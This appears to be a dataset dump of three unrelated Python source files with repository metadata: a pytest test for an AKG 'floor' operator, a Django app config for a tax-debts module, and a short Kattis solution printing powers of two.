Testcase_PrepareCondition:
Testcase_TestSteps:
Testcase_ExpectedResult:
"""
import datetime
import os
import pytest
from base import TestBase
from nose.plugins.attrib import attr
from test_run.floor_run import floor_run
############################################################
# TestCase= class: put to tests/*/
############################################################
class TestCase(TestBase):
def setup(self):
case_name = "test_akg_floor_001"
case_path = os.getcwd()
self.params_init(case_name, case_path)
self.caseresult = True
self._log.info("============= {0} Setup case============".format(self.casename))
self.testarg_ci = [
#caseflag,opfuncname,testRunArgs, dimArgs
# Deeplab v3
# ("004_floor_4_33_33_256", floor_run, ((4, 33, 33, 256), "float16", "cce_floor_fp16")),
("005_floor", floor_run, ((128, 1280), "float32", "cce_floor_fp32")),
]
self.testarg = [
#caseflag,opfuncname,testRunArgs, dimArgs
("001_floor_8192_1024", floor_run, ((8192, 1024), "float16", "cce_floor_fp16"), ((8, 8), (1024, 1024))),
("002_floor_64_16_128_128", floor_run, ((64, 16, 128, 128), "float16", "cce_floor_fp16"), ((1, 1), (1, 1), (64, 64), (128, 128))),
("003_floor_64_128_1024", floor_run, ((64, 128, 1024), "float16", "cce_floor_fp16"), ((1, 1), (8, 8), (1024, 1024))),
]
return
def test_run_ci(self):
self.common_run(self.testarg_ci)
def test_run(self):
self.common_run(self.testarg)
def teardown(self):
self._log.info("============= {0} Teardown============".format(self.casename))
return
| [
"[email protected]"
] | |
fadc77c7549de3d2eee4a4343e2f9d1d1c73a6b8 | 1bba82345900327ed1c128e8046dc91f90a0ccb5 | /tax_debts/apps.py | 0f0af72642fe3c3364064a1e06acab7be13c0dc7 | [
"MIT"
] | permissive | dchaplinsky/ragoogle | 40bd093682e41d1ee2a77f446c69d09e82bb3948 | dccb3d29334c3220ea12c46c725c443c8bd725c0 | refs/heads/master | 2021-06-11T10:07:41.142843 | 2020-10-12T10:30:39 | 2020-10-12T10:30:39 | 136,800,715 | 3 | 3 | MIT | 2021-03-19T23:20:02 | 2018-06-10T10:51:30 | CSS | UTF-8 | Python | false | false | 682 | py | from abstract.apps import AbstractConfig
from .loader import TaxDebtsLoader
from .elastic_models import ElasticTaxDebtsModel, tax_debts_idx
class TaxDebtsConfig(AbstractConfig):
name = "tax_debts"
verbose_name = "Податковий борг"
short_name = "ДФС"
loader_class = TaxDebtsLoader
@property
def data_model(self):
# Doing that to prevent circular imports of some kind
from .models import TaxDebtsModel
return TaxDebtsModel
@property
def sitemap(self):
from .sitemaps import TaxDebtsSitemap
return TaxDebtsSitemap
elastic_model = ElasticTaxDebtsModel
elastic_index = tax_debts_idx
| [
"[email protected]"
] | |
84e37ca82405d9435b0a64bdc32f81f785b186e4 | 5f9e0c226c6f99f04446d60cd21282e7e6b05d2c | /sequence.py | 4def0862fac63ace7d5d9b90c17358bee744d122 | [] | no_license | JONNY-ME/my-kattis-solution | 867ac267dbb5faa6f7c2af35b435498a22ae269d | 51c70e0fd25f1f369cdcd2ce49a54d5d0df2358e | refs/heads/main | 2023-06-17T20:04:04.701038 | 2021-07-16T09:35:35 | 2021-07-16T09:35:35 | 386,583,581 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 167 | py | from math import log, ceil
k = log(int(input()), 2)
if k == int(k):
k = int(k)+1
else:
k = ceil(k)
print(k)
for i in range(k):
print(2**i, end=' ')
print() | [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.